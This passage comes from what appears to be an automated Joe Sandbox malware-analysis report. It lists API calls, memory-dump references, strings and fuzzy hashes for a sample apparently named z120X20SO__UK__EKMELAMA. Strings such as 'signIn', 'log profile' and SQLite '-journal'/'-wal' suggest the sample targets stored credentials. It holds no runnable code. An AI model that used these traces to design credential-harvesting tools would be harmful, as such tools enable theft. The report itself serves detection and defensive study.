                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                              • free.MSVCRT ref: 004185AC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2802642348-0
                                                                                                                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                              • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                              • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                              • API String ID: 3510742995-3273207271
                                                                                                                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                              APIs
                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                                                              • memset.MSVCRT ref: 00413ADC
                                                                                                                                                              • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                              • memset.MSVCRT ref: 00413BD7
                                                                                                                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                              • String ID: 3A
                                                                                                                                                              • API String ID: 3300951397-293699754
                                                                                                                                                              • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                              • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                              • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                              • String ID: strings
                                                                                                                                                              • API String ID: 3166385802-3030018805
                                                                                                                                                              • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                              • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                              • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                              • String ID: AE$.cfg$General$EA
                                                                                                                                                              • API String ID: 776488737-1622828088
                                                                                                                                                              • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                              • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                              • memset.MSVCRT ref: 0040D906
                                                                                                                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                              • String ID: sysdatetimepick32
                                                                                                                                                              • API String ID: 1028950076-4169760276
                                                                                                                                                              • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                              • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                              • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                              • String ID: -journal$-wal
                                                                                                                                                              • API String ID: 438689982-2894717839
                                                                                                                                                              • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                              • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Item$Dialog$MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3975816621-0
                                                                                                                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                              APIs
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                              • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                              • API String ID: 1214746602-2708368587
                                                                                                                                                              • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                              • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                              APIs
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                                                              • memset.MSVCRT ref: 00405E33
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                                                              • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2313361498-0
                                                                                                                                                              • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                              • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                              APIs
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2047574939-0
                                                                                                                                                              • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                              • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4218492932-0
                                                                                                                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                              • String ID: gj
                                                                                                                                                              • API String ID: 438689982-4203073231
                                                                                                                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                              • API String ID: 3510742995-2446657581
                                                                                                                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
